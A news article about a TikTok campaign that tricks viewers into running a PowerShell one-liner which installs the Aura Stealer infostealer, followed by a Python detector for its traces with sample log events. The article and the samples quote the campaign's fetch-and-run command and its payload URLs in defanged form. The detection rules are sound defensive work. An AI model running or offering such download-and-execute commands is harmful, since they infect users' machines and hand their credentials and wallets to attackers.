TikTok Campaign Spreads Malware via Fake Software Activators

by Tekmono Editorial Team
21/10/2025
in News

Cybercriminals are using TikTok to distribute information-stealing malware in a campaign that disguises the infection steps as free activation guides for popular software, tricking viewers into infecting their own computers.

ISC Handler Xavier Mertens identified the ongoing operation on October 19, 2025; it relies on social engineering to deceive users. The campaign resembles an operation observed by Trend Micro in May, in which TikTok videos falsely claimed to offer instructions for activating legitimate software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as fabricated services like “Netflix Premium” and “Spotify Premium.”

The technique is known as a ClickFix attack: the victim is given seemingly helpful instructions that lead them to run malicious commands themselves. The videos display a short, one-line PowerShell command and instruct viewers to execute it with administrator privileges. One example command shown is iex (irm slmgr[.]win/photoshop). The program name at the end of the URL is changed to match whichever software the video impersonates.

When a user executes this command, PowerShell connects to the remote site slmgr[.]win, retrieves a second PowerShell script and runs it. That script in turn downloads two executable files hosted on Cloudflare Pages. The first, downloaded from https://file-epq[.]pages[.]dev/updater.exe, is a variant of the Aura Stealer malware, which harvests saved credentials from web browsers, authentication cookies, cryptocurrency wallets, and login data from other applications. The stolen information is uploaded to the attackers, giving them access to the victim’s accounts.

A second payload, named source.exe, is also downloaded. It compiles code at runtime using the Visual C# compiler (csc.exe) that ships with the .NET Framework, then injects the compiled code and launches it directly in memory. The purpose of this second payload has not yet been determined.
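The infection chain above leaves two reliable traces on a Windows host: the one-liner itself, which lands in PowerShell ScriptBlock logging (Event ID 4104) and expands to Invoke-Expression (Invoke-RestMethod ...) because iex and irm are built-in aliases, and the stage-two payload, which spawns csc.exe with PowerShell as its parent (visible in Sysmon process-creation events, Event ID 1). The following detector is an added example written for this article; it is not code from Tekmono, the ISC diary or Trend Micro. The event dictionaries, field names and sample log entries are constructed to resemble those log sources, and the indicators in the samples are the defanged ones quoted above.

```python
import re
from typing import Dict, List, Tuple

# A PowerShell "download cradle" pairs something that fetches remote content
# with something that executes it. Aliases are matched alongside full cmdlet
# names so `iex (irm ...)` and `iwr ... | iex` both hit.
EXEC_VERBS = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH_VERBS = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b",
    re.I,
)
# Stage-two binaries in this campaign were served from *.pages.dev hosts.
PAGES_DEV_URL = re.compile(r"https?://[^\s()]*?\.pages\.dev\b", re.I)


def refang(text: str) -> str:
    """Undo common defanging ('slmgr[.]win', 'hxxp://') so the same patterns
    work on real telemetry and on samples copied from a report."""
    return re.sub(r"\[\.\]", ".", text).replace("hxxp", "http")


def script_indicators(script: str) -> List[str]:
    """Indicators found in one ScriptBlock text (Event ID 4104)."""
    text = refang(script)
    hits = []
    if EXEC_VERBS.search(text) and FETCH_VERBS.search(text):
        hits.append("download_cradle")
    if PAGES_DEV_URL.search(text):
        hits.append("pages_dev_url")
    return hits


def process_indicators(event: Dict) -> List[str]:
    """Indicators in one process-creation event (Sysmon Event ID 1)."""
    image = event.get("image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    hits = []
    # csc.exe normally runs under build tooling, not under an interactive shell.
    if image == "csc.exe" and parent in ("powershell.exe", "pwsh.exe"):
        hits.append("csc_spawned_by_powershell")
    return hits


def classify(event: Dict) -> List[str]:
    """Route an event to the matching indicator set by the fields it carries."""
    if "script" in event:
        return script_indicators(event["script"])
    if "image" in event:
        return process_indicators(event)
    return []


def scan(events: List[Dict]) -> List[Tuple[int, List[str]]]:
    """Return (event id, indicators) for every event that raised at least one."""
    flagged = []
    for event in events:
        hits = classify(event)
        if hits:
            flagged.append((event["id"], hits))
    return flagged


# Constructed sample telemetry (not real logs). Events 1-3 mimic the chain
# described in the article; events 4-5 are benign look-alikes.
SAMPLE_EVENTS = [
    {"id": 1, "source": "PowerShell/4104", "script": "iex (irm slmgr[.]win/photoshop)"},
    {"id": 2, "source": "PowerShell/4104",
     "script": "Invoke-WebRequest 'https://file-epq[.]pages[.]dev/updater.exe' -OutFile $env:TEMP\\updater.exe"},
    {"id": 3, "source": "Sysmon/1",
     "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"id": 4, "source": "PowerShell/4104", "script": "Get-ChildItem $env:USERPROFILE | Measure-Object"},
    {"id": 5, "source": "Sysmon/1",
     "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
     "parent_image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe"},
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

The cradle rule deliberately requires both a fetch verb and an execution verb, so a plain download to disk (event 2) is reported only through the hosting indicator and ordinary Invoke-WebRequest use stays quiet; that trades some recall for a low false-positive rate. The csc.exe rule keys on the parent process rather than the path, because the compiler binary itself is legitimate and is routinely started by MSBuild. Obfuscated one-liners (string concatenation, encoded commands) will evade these regexes, which is one reason ScriptBlock logging is the preferred source: it records the de-obfuscated script as PowerShell actually executed it.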

Users who have followed the instructions in these videos are advised to consider all of their credentials compromised and immediately reset passwords for all websites and online services they use. ClickFix attacks have become significantly more common over the past year, used to distribute various malware strains in campaigns related to ransomware and cryptocurrency theft.

As a general security practice, users should never copy text from a website and execute it in an operating system dialog box, including the File Explorer address bar, command prompt, PowerShell, macOS terminal, or Linux shells.

Tekmono is a Linkmedya brand. © 2015.